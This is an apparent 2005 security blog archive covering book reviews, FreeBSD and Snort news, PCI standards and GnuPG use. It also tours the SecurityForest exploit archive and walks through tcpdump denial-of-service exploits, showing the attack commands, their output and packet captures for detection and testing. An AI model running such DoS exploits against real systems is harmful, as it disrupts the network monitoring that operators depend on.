Saturday, April 30, 2005

Reviews of VoIP Security, The Internet and Its Protocols Posted

I refused to let April end without finishing and reviewing these two books kindly provided by Elsevier Press. The first was a disappointment. Amazon.com just posted my three star review of VoIP Security. From the review:

"I decided to read VoIP Security because I thought it would describe VoIP protocols and ways to secure them. The table of contents looked very strong and the preface seemed to meet my goals: "For one to truly understand Internet telephony, the reader must have a solid understanding of digital voice, telephony, networking, Internet protocols, and, most important of all, how all of these technologies are put together." Unfortunately, the book is confusing at times and is not an improvement over earlier VoIP security books. So-called 'reviewers' who write that this book 'goes heavily into explaining the low level mechanics of VoIP' reveal they don't read the books they purport to review."

Thankfully, I was very pleased to read the second book Elsevier sent me. Amazon.com just posted my five star review of Adrian Farrel's The Internet and Its Protocols. From the review:

"Adrian Farrel's The Internet and Its Protocols (TIAIP) blew me away. I read this book because it explains the Internet I know, but also how new protocols work with that Internet and make it different from the network I first encountered over a decade ago. Farrel's amusing yet clear writing style delivers a great deal of knowledge in a hefty hardcover. If you want to learn about the protocols that make the Internet work, you need to read TIAIP."

If you want to get a handle on the new protocols appearing in your network, like Multi-Protocol Label Switching (MPLS) or Stream Control Transmission Protocol (SCTP), you should read The Internet and Its Protocols.

FreeBSD 5.4-RC4 Imminent

As I guessed recently, we should see FreeBSD 5.4 RELEASE arrive next week or very soon thereafter. Scott Long posted an update on the release status of 5.4 this morning. He says:

"As you probably noticed, we are a bit behind on the 5.4 release. There was a major stability problem reported several weeks ago in a particlar high load, high profile environment, and we decided that it was in everyones best interest to get it resolved before the release. Well, thanks to the tireless efforts of Doug White and Stephen Uphoff and several others, the bug has been found, fixed, and verified. As soon as it and a few other fixes get merged in, we will start the RC4 build process and hopefully release it for testing late this weekend. After that, unless another show-stopper comes up, we expect to build and release 5.4-RELEASE next weekend."

I hope to test 5.4-RC4 this week, assuming it arrives tomorrow. Thanks FreeBSD release team!

SecurityForest.com ExploitTree

This afternoon I was researching a bot for a chapter in my latest book. I don't spend a lot of time on exploit sites because I am not a penetration tester by trade. I think the last time I really looked at exploits, sites like www.hack.co.za were still around!

While searching for the bot in question, I happened to find SecurityForest.com, although the site was announced on BugTraq in March. SecurityForest.com is an impressive piece of work. The site is essentially a giant CVS archive of attack code, called the ExploitTree. They provide a Client Utility, which at least for UNIX, is an interface to a native CVS client. For Windows, they provide everything you need to access a CVS server.

Here is how a session using the ExploitTree Client Utility appears under UNIX.


./ExploitTree.pl anonymous

ExploitTree Client Utility Manager v0.6
----------------------------------------

1) Initialize (first time download)
2) Update Repository
3) Print Exploit Statistics
q) Quit

> 1
Password is blank (press enter), then wait...

Logging in to :pserver:anonymous@cvs.securityforest.com:2401/home/security/cvsroot
CVS password:
cvs login: warning: failed to open /home/richard/.cvspass for reading:
No such file or directory
cvs server: Updating ExploitTree
U ExploitTree/_SecurityForest
U ExploitTree/_Ver
U ExploitTree/bids.txt
U ExploitTree/exploit_db.txt
U ExploitTree/xsearch.pl
U ExploitTree/xsearch2-beta.pl
cvs server: Updating ExploitTree/application
U ExploitTree/application/_SecurityForest
cvs server: Updating ExploitTree/application/_uncategorized
U ExploitTree/application/_uncategorized/0verkill-exploit.c
U ExploitTree/application/_uncategorized/0x82-GNATS_sux.c
U ExploitTree/application/_uncategorized/0x82-Remote.tannehehe.xpl.c
U ExploitTree/application/_uncategorized/0x82-libCGIfpxpl.c
U ExploitTree/application/_uncategorized/101_shixx.cpp
...edited...
U ExploitTree/system/tru64/TRU64_xkb.pl
U ExploitTree/system/tru64/_SecurityForest
Quiting...

Here's an example of what one finds when the download process is finished.

janney:/home/richard/exploittree/ExploitTree$ ls
CVS bids.txt xsearch.pl
_SecurityForest exploit_db.txt xsearch2-beta.pl
_Ver network
application system
janney:/home/richard/exploittree/ExploitTree$ cd system/
janney:/home/richard/exploittree/ExploitTree/system$ ls
CVS atheos irix novell tru64
_SecurityForest beos linux qnx
_uncategorized bsd mac_osx sco
aix hpux microsoft solaris
janney:/home/richard/exploittree/ExploitTree/system$ cd bsd
janney:/home/richard/exploittree/ExploitTree/system/bsd$ ls
CVS _SecurityForest local remote
janney:/home/richard/exploittree/ExploitTree/system/bsd$ cd remote/
janney:/home/richard/exploittree/ExploitTree/system/bsd/remote$ ls
CVS animal.c freebsd obooptd.c rpc.autofsd.c
_SecurityForest bsdi netbuf.c openbsd stream3.c
janney:/home/richard/exploittree/ExploitTree/system/bsd/remote$ cd freebsd/
janney:/home/richard/exploittree/ExploitTree/system/bsd/remote/freebsd$ ls
CVS fbsd-DoS.c ronin.c
DSR-cfengine.pl fbsd-bnc.c turkey2.c
_SecurityForest ftpspy.c
cURL-remote-FBSD.pl ppp.c

I chose a sparsely populated set of directories. The Microsoft section is much longer.

What's nice about this set-up is that you can synchronize your local copy of the ExploitTree with the SecurityForest.com version using CVS.

Other helpful exploit sites include milw0rm.com and ExploitWatch, which reports on newly available exploits by linking to them.

Friday, April 29, 2005

Cut Budgets If Security Fails to Improve?

I find this note from a recent GovExec story valuable:

"House Government Reform Chairman Tom Davis, R-Va., said Thursday [7 April] that agencies could have their budgets cut if their information technology security does not improve.

With several agencies struggling to meet requirements of the 2002 Federal Information Security Management Act, Davis said that compliance eventually has to be tied to funding."

This will never happen. Does Congress advocate cutting funds to poorly performing schools? Regardless of the merits of the approach, I can not see enough people supporting this tactic. Agencies will continue to "muddle through" until evidence of a massive intrusion becomes public. I hope that day never arrives, though.

Join Me at USENIX Security 05

You may have noticed the new banner at the top of the Blog showing the 14th USENIX Security Symposium in Baltimore, MD, 31 July - 5 August 2005. I presented a one day NSM tutorial at USENIX Security 04 in San Diego, CA last year, and an improved version of that course at USENIX 05 in Anaheim, CA two weeks ago.

In Baltimore this summer, I will be presenting Network Security Monitoring with Open Source Tools on 31 July, followed by my brand-new Network Incident Response tutorial on 1 August. Descriptions for each class are available via the provided links. I am really looking forward to offering these classes, especially with the MD-DC-VA crowds in attendance. These are both day-long classes.

If you register before 11 July, one day will cost $625 and two days will cost $1200 (for non-students). USENIX offers discounts if five or more people from the same organization attend.

I plan to create a proposal for a network forensics class, and submit it along with my NSM and network IR tutorials for Large Installation System Administration (LISA) conference in December in San Diego, CA. If you would like to see such a class, please contact the training coordinator and let him know!

What's the difference between network IR and network forensics? The network IR class is more about reacting to, containing, and remediating intrusions. It's similar to firefighting. The network forensics class covers collecting, preserving, analyzing, presenting (perhaps to a jury), and defending (under cross-examination) network evidence. The forensics angle concentrates on ensuring your investigation is sound and could support a successful prosecution or human resources action, if necessary.

IR and forensics subjects are often taught from a host-centric perspective, so I believe there is room for network-focused tutorials.

Two More Pre-Reviews

Two new books arrived at TaoSecurity world headquarters this week to be added to my reading queue. The first is Silence on the Wire by Michal Zalewski. This looks like a creative and unconventional look at digital security, although the book's subtitle is "A Field Guide to Passive Reconnaissance and Indirect Attacks." Michal was kind enough to email me to ask if I would review his book. You may recognize Michal for some of his work, like the P0f tool or his really cool TCP sequence number analysis.

The second book is Python Cookbook, 2nd Ed by Alex Martelli, Anna Ravenscroft, and David Ascher. This new edition covers Python 2.3 and 2.4. I consider this book another piece of my Python education program, which I plan to start in the next month or so. This book is helpful because it presents over 300 problems, code solutions, and discussions of those problems. Assuming the code is good, Python programmers will not have to reinvent the wheel if a problem they face is similar to one in the book. I think this sort of "solid code reuse plan" makes a lot of sense.

If you're wondering why you haven't see any recent book reviews, I'm working my way through the excellent The Internet and Its Protocols by Adrian Farrel. It's an 800 page protocol text, so it's taking a while. I also read everything I review, unlike some of the other reviewers with higher Amazon rankings!

Sources of Free Security Market Research

This morning I was looking for security market research and I came across two useful resources. First, CSO Online provides an Analyst Report section with summaries of research by all of the big name firms. For example, you can read about Symantec Gains Added Vendor Neutrality with New IPS Support by Current Analysis or Deciphering the Dual Meaning of Compliance Monitoring by Forrester. These are not the full articles, but there is enough there to make for interesting reading.

I also found some good press releases on security research from Infonetics Research. These include:

The last article's chart is revealing. It appears in-line "IPS" platforms are set to have a greater revenue share in 2005 than network IDS for the first time. I am not finding this surprising. When I looked this morning to find the "leading" IDS or IPS solutions, I created this list:

What would you add to this list? If you were to take a next-generation course on IDS/IPS and network security monitoring, what products would you want to try, hands-on, in the class?

Thursday, April 28, 2005

Internal Revenue Service Hassling You? Cite Security Issues

I filed my taxes a few weeks ago. Now I read in Techweb and Reuters that the Internal Revenue Service's security is horrible. According to Andy Sullivan of Reuters:

"Security flaws in computer systems used by the Internal Revenue Service expose millions of taxpayers to potential identity theft or illegal police snooping, according to a congressional report released today.

The IRS also is unlikely to know if outsiders are browsing through citizens' tax returns because it doesn't effectively police its computer systems for unauthorized use, the Government Accountability Office found."

Greg Keizer writes even more disturbing findings:

"The GAO, for instance, found that nearly 7,500 mainframe users, which included IRS employees, independent contractors, and non-IRS government employees, all have the ability to access and even change 'sensitive taxpayer' data.

Lack of other security controls and wide-open access privileges mean that the IRS might not even know if an identity breach has occurred, said the GAO."

The Government Accounting Office (GAO) report is available in .pdf form here.

It sounds like the IRS cannot account for the integrity of its data. If that is the case, they cannot be sure if the information entered by an e-Filer is what the taxpayer actually entered. They cannot be sure of anything unless they have a paper record or duplicate, separate electronic record protected by alternate means. I guess it was a good idea for me to submit paper records to the IRS -- as long as they are available for review.

Cyber Incident Detection and Data Analysis Center Goes Public

In October 2003 I reported on the Cyber Incident Detection & Data Analysis Center (CIDDAC), a collaboration of the University of Pennsylvania's Institute of Strategic Threat Analysis and Response (ISTAR) laboratory in Philadelphia, the Philadelphia InfraGard chapter, and Charles "Buck" Fleming, CEO of the apparently dormant AdminForce LLC. Details in 2003 were sparse, but I was skeptical that companies would agree to host "what CIDDAC calls Real-time Cyber Attack Detection Sensors, or RCADS, throughout as many U.S. companies as possible — and eventually the world — and feed incident data to a centrally managed operations facility at the University of Pennsylvania at Philadelphia."

Stories by Infoworld and Computerworld are shedding some light on the situation. First, it does not appear CIDDAC will watch company traffic. Instead, they are just deploying honeypots:

"John Chesson, a special agent at the FBI in Philadelphia, said the RCADS are essentially 'hardened honeypots' that look like they are part of the network an intruder is trying to enter. When the RCADS are attacked, CIDDAC workers monitor the event and collect real-time data that can be forwarded to law enforcement officials, he said."

I found this comparison chart interesting. It allegedly shows how CIDDAC is superior to other data collection methods.

I wonder what metrics CIDDAC used to determine the width of the colored bars for a competing organization, like CERT? It must be a Philly vs. Pittsburgh issue.

Check this out:

"The initial 30 participants, who are anonymous for security reasons, will pay about $10,000 for the installation of the RCADs and for the first year of monitoring and reports.

'We take minutes to analyze what now takes hours,' Fleming said. 'We know it's going to work. We've had prototypes working for years now.'"

According to reporting, CIDDAC is DHS funded:

"The pilot project, which has been in the planning stages for two years, is being funded through a $200,000 grant from the DHS Science and Technology Directorate and with the support of the FBI."

The CIDDAC FAQ offers these details:

"CIDDAC has received its initial funding and construction is underway at our University of Pennsylvania facility. The build-out, setup and testing estimated completion date is no later than October 2005. CIDDAC services will be available by December 2005. 3."

I'll keep my eye on this project. I would be interested in speaking with anyone from CIDDAC who would like the project profiled here. It seems CIDDAC is a honeypot-based managed security services provider that charges $10,000 per year, has start-up funding from DHS, and works with the Philadelphia FBI and U Penn. Am I wrong?

Tcpdump Vulnerabilities

I learned of four vulnerabilities in Tcpdump found by Vade79 by checking the latest exploits at Packet Storm. Linking to the exploits themselves, they are:

xtcpdump-ldp-dos.c: Tcpdump 3.8.3 and below mishandles Multi-Protocol Label Switching (MPLS) Label Distribution Protocol (LDP) packets. The effect is a local denial of service to Tcpdump. No system needs to be listening to port 646 TCP for Tcpdump to be affected.

If you run xtcpdump-ldp-dos, it looks like this to the attacker:

./xtcpdump-ldp-dos 192.168.1.1 nospoof
[*] tcpdump[3.8.x]: (LDP) ldp_print() infinite loop DOS.
[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)

[*] destination : 192.168.1.1
[*] amount : 5

[+] sending(packet = .): .....

[*] done.

Here is how Tcpdump handles it, if you're running Tcpdump "live" on the CLI without the -v switch:

Unknown Message (0x7fff), length: 0, Message ID:
0xffffffff, Flags: [continue processing if unknown]
Unknown Message (0x7fff), length: 0, Message ID:
0xffffffff, Flags: [continue processing if unknown]
...continues...

If you add the -v switch, you see this:

09:09:02.092665 IP (tos 0x0, ttl 64, id 41668, offset 0,
flags [none], length: 46) 192.168.1.5.52016 > 192.168.1.1.646:
[udp sum ok]
LDP, Label-Space-ID: 255.255.255.255:65535, length: 18
Unknown Message (0x7fff), length: 0, Message ID:
0xffffffff, Flags: [continue processing if unknown]
0x0000: 0402 6ee0 7042 0e6a 0100 4600 0000 4600
0x0010: 0000 1200 0030 4841 f956 00c0 9f3f 4fc5
0x0020: 0800 4500 0038 917f 0000 4001 65ef c0a8
0x0030: 0101 c0a8 0105 0303 2f2c 0000 0000 4500
0x0040: 002e a2c4 0000 4011 54a4 c0a8 0105 c0a8
0x0050: 0101 cb30 0286 001a 0000 6ee0 7042 3b53
0x0060: 0200 3c00 0000 3c00 0000 1200 00c0 9f3f
0x0070: 4fc5 0030 4841 f956 0800 4500 002e a2c5
0x0080: 0000 4011 54a3 c0a8 0105 c0a8 0101 cb31
0x0090: 0286 001a aeaa 0001 ffff ffff ffff ffff
0x00a0: ffff 0000 ffff ffff 1e38 6ee0 7042 4953
0x00b0: 0200 4600 0000 4600 0000 1200 0030 4841
0x00c0: f956 00c0 9f3f 4fc5 0800 4500 0038 9180
0x00d0: 0000 4001 65ee c0a8 0101 c0a8 0105 0303
0x00e0: 2f2b 0000 0000 4500 002e a2c5 0000 4011
0x00f0: 54a3 c0a8 0105 c0a8 0101 cb31 0286 001a
0x0100: 0000 6ee0 7042 783d 0300 3c00 0000 3c00
0x0110: 0000 1200 00c0 9f3f 4fc5 0030 4841 f956
...continues...

Here is how Snort sees the traffic. Only one packet is shown.

04/28-09:07:30.928973 192.168.1.5:52016 -> 192.168.1.1:646
UDP TTL:64 TOS:0x0 ID:41668 IpLen:20 DgmLen:46
Len: 18
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00 ...?O..0HA.V..E.
0x0010: 00 2E A2 C4 00 00 40 11 54 A4 C0 A8 01 05 C0 A8 ......@.T.......
0x0020: 01 01 CB 30 02 86 00 1A AE AB 00 01 FF FF FF FF ...0............
0x0030: FF FF FF FF FF FF 00 00 FF FF FF FF ............

Here is sample traffic for you to try: ldp-dos.taosecurity.lpc. You should be able to run this through Tcpdump using the -r option without killing Tcpdump.

xtcpdump-bgp-dos.c: Tcpdump 3.8.3 and below mishandles Border Gateway Protocol (BGP) packets. The effect is a local denial of service to Tcpdump. A system watched by Tcpdump needs to be listening on port 179 TCP for Tcpdump to be affected. I simulated this by having Netcat listen on port 179 TCP.

If you run xtcpdump-bgp-dos.c, it looks like this to the attacker:

./xtcpdump-bgp-dos.c 192.168.1.1 nospoof
[*] tcpdump[3.8.x]: (BGP) RT_ROUTING_INFO infinite loop DOS.
[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)

[*] target: 192.168.1.1
[*] attempting to connect...
[*] successfully connected.
[*] sending malformed BGP data. (34 bytes)
[*] closing connection.

[*] done.

Here is how Tcpdump handles it, if you're running Tcpdump "live" on the CLI:

tcpdump -n -i em1 -s 1515 -v

tcpdump: listening on em1, link-type EN10MB (Ethernet), capture size 1515 bytes
09:04:48.530004 IP (tos 0x0, ttl 64, id 37797, offset 0,
flags [DF], length: 60) 192.168.1.5.57471 > 192.168.1.1.179:
S [tcp sum ok] 2061108147:2061108147(0) win 65535


09:04:48.530039 IP (tos 0x0, ttl 64, id 30686, offset 0,
flags [DF], length: 60) 192.168.1.1.179 > 192.168.1.5.57471:
S [bad tcp cksum 8385 (->b9d4)!] 2753925437:2753925437(0)
ack 2061108148 win 65535 timestamp 207951117 145837700>

09:04:48.530250 IP (tos 0x0, ttl 64, id 37798, offset 0,
flags [DF], length: 52) 192.168.1.5.57471 > 192.168.1.1.179:
. [tcp sum ok] ack 1 win 33304 145837700 207951117>

09:04:49.031589 IP (tos 0x0, ttl 64, id 37800, offset 0,
flags [DF], length: 87) 192.168.1.5.57471 > 192.168.1.1.179:
P [tcp sum ok] 1:36(35) ack 1 win 33304 145837751 207951117>: BGP, length: 35
Update Message (2), length: 19
Withdrawn routes: 1 bytes
Multi-Protocol Reach NLRI (14), length: 255,
Flags [OTPE+f]:
AFI: IPv4 (1), vendor specific SAFI: Route Target
Routing Information (132), no SNPA
(illegal prefix length)
(illegal prefix length)
...continues...

Here is how Snort sees the traffic. Although the entire session is shown, the fourth packet is the killer.

04/28-09:03:17.383320 192.168.1.5:57471 -> 192.168.1.1:179
TCP TTL:64 TOS:0x0 ID:37797 IpLen:20 DgmLen:60 DF
******S* Seq: 0x7ADA03B3 Ack: 0x0 Win: 0xFFFF TcpLen: 40
TCP Options (6) => MSS: 1460 NOP WS: 1 NOP NOP TS: 145837700 0
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00 ...?O..0HA.V..E.
0x0010: 00 3C 93 A5 40 00 40 06 23 C0 C0 A8 01 05 C0 A8 .<..@.@.#.......
0x0020: 01 01 E0 7F 00 B3 7A DA 03 B3 00 00 00 00 A0 02 ......z.........
0x0030: FF FF 10 BB 00 00 02 04 05 B4 01 03 03 01 01 01 ................
0x0040: 08 0A 08 B1 4E 84 00 00 00 00 ....N.....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:17.383581 192.168.1.1:179 -> 192.168.1.5:57471
TCP TTL:64 TOS:0x0 ID:30686 IpLen:20 DgmLen:60 DF
***A**S* Seq: 0xA425913D Ack: 0x7ADA03B4 Win: 0xFFFF TcpLen: 40
TCP Options (6) => MSS: 1460 NOP WS: 1 NOP NOP TS: 207951117 145837700
0x0000: 00 30 48 41 F9 56 00 C0 9F 3F 4F C5 08 00 45 00 .0HA.V...?O...E.
0x0010: 00 3C 77 DE 40 00 40 06 3F 87 C0 A8 01 01 C0 A8 .0x0020: 01 05 00 B3 E0 7F A4 25 91 3D 7A DA 03 B4 A0 12 .......%.=z.....
0x0030: FF FF B9 D4 00 00 02 04 05 B4 01 03 03 01 01 01 ................
0x0040: 08 0A 0C 65 15 0D 08 B1 4E 84 ...e....N.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:17.383646 192.168.1.5:57471 -> 192.168.1.1:179
TCP TTL:64 TOS:0x0 ID:37798 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x7ADA03B4 Ack: 0xA425913E Win: 0x8218 TcpLen: 32
TCP Options (3) => NOP NOP TS: 145837700 207951117
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00 ...?O..0HA.V..E.
0x0010: 00 34 93 A6 40 00 40 06 23 C7 C0 A8 01 05 C0 A8 .4..@.@.#.......
0x0020: 01 01 E0 7F 00 B3 7A DA 03 B4 A4 25 91 3E 80 10 ......z....%.>..
0x0030: 82 18 63 81 00 00 01 01 08 0A 08 B1 4E 84 0C 65 ..c.........N..e
0x0040: 15 0D ..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:17.884950 192.168.1.5:57471 -> 192.168.1.1:179
TCP TTL:64 TOS:0x0 ID:37800 IpLen:20 DgmLen:87 DF
***AP*** Seq: 0x7ADA03B4 Ack: 0xA425913E Win: 0x8218 TcpLen: 32
TCP Options (3) => NOP NOP TS: 145837751 207951117
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00 ...?O..0HA.V..E.
0x0010: 00 57 93 A8 40 00 40 06 23 A2 C0 A8 01 05 C0 A8 .W..@.@.#.......
0x0020: 01 01 E0 7F 00 B3 7A DA 03 B4 A4 25 91 3E 80 18 ......z....%.>..
0x0030: 82 18 DC FF 00 00 01 01 08 0A 08 B1 4E B7 0C 65 ............N..e
0x0040: 15 0D FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
0x0050: FF FF 00 13 02 00 01 00 FF 00 FF 0E 00 FF 00 01 ................
0x0060: 84 00 00 00 00 .....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:17.984345 192.168.1.1:179 -> 192.168.1.5:57471
TCP TTL:64 TOS:0x0 ID:30793 IpLen:20 DgmLen:52 DF
***A**** Seq: 0xA425913E Ack: 0x7ADA03D7 Win: 0x8218 TcpLen: 32
TCP Options (3) => NOP NOP TS: 207951178 145837751
0x0000: 00 30 48 41 F9 56 00 C0 9F 3F 4F C5 08 00 45 00 .0HA.V...?O...E.
0x0010: 00 34 78 49 40 00 40 06 3F 24 C0 A8 01 01 C0 A8 .4xI@.@.?$......
0x0020: 01 05 00 B3 E0 7F A4 25 91 3E 7A DA 03 D7 80 10 .......%.>z.....
0x0030: 82 18 62 EE 00 00 01 01 08 0A 0C 65 15 4A 08 B1 ..b........e.J..
0x0040: 4E B7 N.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:18.396501 192.168.1.5:57471 -> 192.168.1.1:179
TCP TTL:64 TOS:0x0 ID:38045 IpLen:20 DgmLen:52 DF
***A***F Seq: 0x7ADA03D7 Ack: 0xA425913E Win: 0x8218 TcpLen: 32
TCP Options (3) => NOP NOP TS: 145837802 207951178
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00 ...?O..0HA.V..E.
0x0010: 00 34 94 9D 40 00 40 06 22 D0 C0 A8 01 05 C0 A8 .4..@.@.".......
0x0020: 01 01 E0 7F 00 B3 7A DA 03 D7 A4 25 91 3E 80 11 ......z....%.>..
0x0030: 82 18 62 BA 00 00 01 01 08 0A 08 B1 4E EA 0C 65 ..b.........N..e
0x0040: 15 4A .J

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:18.396841 192.168.1.1:179 -> 192.168.1.5:57471
TCP TTL:64 TOS:0x0 ID:31075 IpLen:20 DgmLen:52 DF
***A**** Seq: 0xA425913E Ack: 0x7ADA03D8 Win: 0x8218 TcpLen: 32
TCP Options (3) => NOP NOP TS: 207951219 145837802
0x0000: 00 30 48 41 F9 56 00 C0 9F 3F 4F C5 08 00 45 00 .0HA.V...?O...E.
0x0010: 00 34 79 63 40 00 40 06 3E 0A C0 A8 01 01 C0 A8 .4yc@.@.>.......
0x0020: 01 05 00 B3 E0 7F A4 25 91 3E 7A DA 03 D8 80 10 .......%.>z.....
0x0030: 82 18 62 91 00 00 01 01 08 0A 0C 65 15 73 08 B1 ..b........e.s..
0x0040: 4E EA N.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:18.396856 192.168.1.1:179 -> 192.168.1.5:57471
TCP TTL:64 TOS:0x0 ID:31076 IpLen:20 DgmLen:52 DF
***A***F Seq: 0xA425913E Ack: 0x7ADA03D8 Win: 0x8218 TcpLen: 32
TCP Options (3) => NOP NOP TS: 207951219 145837802
0x0000: 00 30 48 41 F9 56 00 C0 9F 3F 4F C5 08 00 45 00 .0HA.V...?O...E.
0x0010: 00 34 79 64 40 00 40 06 3E 09 C0 A8 01 01 C0 A8 .4yd@.@.>.......
0x0020: 01 05 00 B3 E0 7F A4 25 91 3E 7A DA 03 D8 80 11 .......%.>z.....
0x0030: 82 18 62 90 00 00 01 01 08 0A 0C 65 15 73 08 B1 ..b........e.s..
0x0040: 4E EA N.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:18.396922 192.168.1.5:57471 -> 192.168.1.1:179
TCP TTL:64 TOS:0x0 ID:38046 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x7ADA03D8 Ack: 0xA425913F Win: 0x8217 TcpLen: 32
TCP Options (3) => NOP NOP TS: 145837802 207951219
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00 ...?O..0HA.V..E.
0x0010: 00 34 94 9E 40 00 40 06 22 CF C0 A8 01 05 C0 A8 .4..@.@.".......
0x0020: 01 01 E0 7F 00 B3 7A DA 03 D8 A4 25 91 3F 80 10 ......z....%.?..
0x0030: 82 17 62 91 00 00 01 01 08 0A 08 B1 4E EA 0C 65 ..b.........N..e
0x0040: 15 73 .s

Here is sample traffic for you to try: bgp-dos.taosecurity.lpc. You should be able to run this through Tcpdump using the -r option without killing Tcpdump.

Vade79 also released exploits titled xtcpdump-isis-dos.c and xtcpdump+ethr-rsvp-dos.c, for Intermediate System to Intermediate System (IS-IS) and Resource ReSerVation setup Protocol (RSVP), respectively.

While I could get all four exploits to compile on FreeBSD, I could not get these last two to generate traffic. I believe the problem lies with the spoofing mechanism in each exploit. I was only able to get the first two exploits to work when I enabled the "nospoof" options.

Keep an eye on Tcpdump.org and the tcpdump-workers mailing list for developments. The latest tcpdump-current.tar.gz or CVS check-outs should be patched. I also expect to see a Tcpdump 3.9.0 official release patched against these problems next week.

Wednesday, April 27, 2005

Payment Card Industry Security Guidelines

I heard about this back in December, but it slipped off my radar. Now news outlets like The Register and News.com are reporting on the Payment Card Industry (PCI) Data Security Standard. Prior to standardization on the PCI, vendors had to juggle the Visa Cardholder Information Security Program (CISP), the MasterCard Site Data Protection Program, the American Express Data Security Operating Policy (DSOP), and the Discover Information Security and Compliance (DISC) document.

The PCI was publicized back in December when Visa released a memo (available in .pdf form here) letting vendors know what was happening.

The PCI standard consists of twelve requirements:

Build and Maintain a Secure Network
1. Install and maintain a firewall configuration to protect data
2. Do not use vendor-supplied defaults for system passwords and other security parameters

Protect Cardholder Data
3. Protect stored data
4. Encrypt transmission of cardholder data and sensitive information across public networks

Maintain a Vulnerability Management Program
5. Use and regularly update anti-virus software
6. Develop and maintain secure systems and applications

Implement Strong Access Control Measures
7. Restrict access to data by business need-to-know
8. Assign a unique ID to each person with computer access
9. Restrict physical access to cardholder data

Regularly Monitor and Test Networks
10. Track and monitor all access to network resources and cardholder data
11. Regularly test security systems and processes
Maintain an Information Security Policy
12. Maintain a policy that addresses information security

Visa's Cardholder Information Security Program page has the most browsable online content, but the Mastercard page has information as well.

Merchant e-Solutions summarizes PCI, with a note than level 2 (150,000 to 6,000,000 transactions per year) and 3 (20,000 to 150,000 transactions per year) merchants require validation by a "Qualified Independent Scan Vendor" no later than June 30, 2005. Some documents also mention a "Qualified Independent Security Assessor." I've emailed Visa to find out how a vendor becomes "qualified," although one of my friends is already taking his security company through the process.

I think helping merchants meet these standards will usher a new wave of assessment business for security vendors. On a smaller scale, requirements to "Regularly Monitor and Test Networks" include intrusion detection and traffic audit components, so I look forward to participating in this process myself.

I noticed Foundstone offers a series of Webcasts on PCI and other standards. Regarding other standards, Application Security Inc. helpfully summarizes several of them in one place.

Update: I just got this email from Visa:

Thank you for your interest in the Visa CISP program. Visa is unable to qualify additional security assessors at this time. We are, however, currently considering opening the qualification program again to accept new security assessors. We will keep your information on file and respond if the program opens again. We will also make this information available on the website, so be sure to check back periodically.

Your company may certainly assist companies in meeting and maintaining compliance with the CISP requirements. Unfortunately, Visa is unable to review compliance solutions at this time.

MasterCard owns the scan vendor qualification program. You will need to contact MasterCard to apply for the program. https://sdp.mastercardintl.com/

Regards,
The CISP Team
http://www.visa.com/cisp

Update 2: Here is Visa's list of Qualified Independent Security Assessors in .pdf format. Here is Mastercard's list of Qualified Independent Scan Vendors. Mastercard explains their vendor certification process on that page, but they have not yet responded to the email I sent yesterday. Mastercard does provide a Web-based form to let candidate vendors begin the certification process.

Update 3: I got an email from Mastercard pointing me to the resources I outlined earlier. The sender said Mastercard charges $5,000 to become a Qualified Independent Scan Vendor. How can they possibly justify this cost? Unlike Visa, however, Mastercard is currently accepting new applicants to become Qualified Independent Scan Vendors.

Tuesday, April 26, 2005

Snort Developments

I have a few news items from the Snort world. First, Snort 2.3.3 was released. This should not have any news rules, as it's not Snort 2.4.0 or Snort 3.0.0. Snort 2.3.3 does feature a so-called "mini-preprocessor" to watch for attacks exploiting Vulnerability in Exchange Server Allows Remote Code Execution (MS05-021). Code to allegedly test for the vulnerability is here, so you might want to try testing Snort 2.3.3 with it.

Second, the Open Source Snort Rules Consortium ossrc-intro mailing list is operational. Currently the lead thread is asking for comments on the latest OSSRC Charter, dated 22 March 2005. This is the same document I previously examined.

Saturday, April 23, 2005

Sending Encrypted Email

In previous blog entries I've created GnuPG keys and decrypted a message encrypted with my public GnuPG key. In this entry I show how I respond with an encrypted email using Enigmail and how I encrypt a file using gpg at the command line.

You'll remember Bob sent me an encrypted email. I decided to send Bob an encrypted email in return. The first task was to find his public key. I used the key search feature. You may remember Bob included pgp.mit.edu in his signature as a hint for where to look for his public key, so I pass that site as the keyserver.

orr:/home/richard$ gpg --keyserver pgp.mit.edu
--search-keys rgrabowsky_at_rasecurity_dot_com
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information
gpg: searching for "rgrabowsky_at_rasecurity_dot_com" from hkp server pgp.mit.edu
(1) Bob Grabowsky bob_at_infotech-nj_dot_com
Bob Grabowsky robertg_at_InfoTech-NJ_dot_com
Robert Grabowsky rgrabowsky_at_rasecurity_dot_com
Bob Grabowsky rgrabowsky_at_rasecuritysystems_dot_com
1024 bit DSA key 7932C9E3, created: 2001-05-27
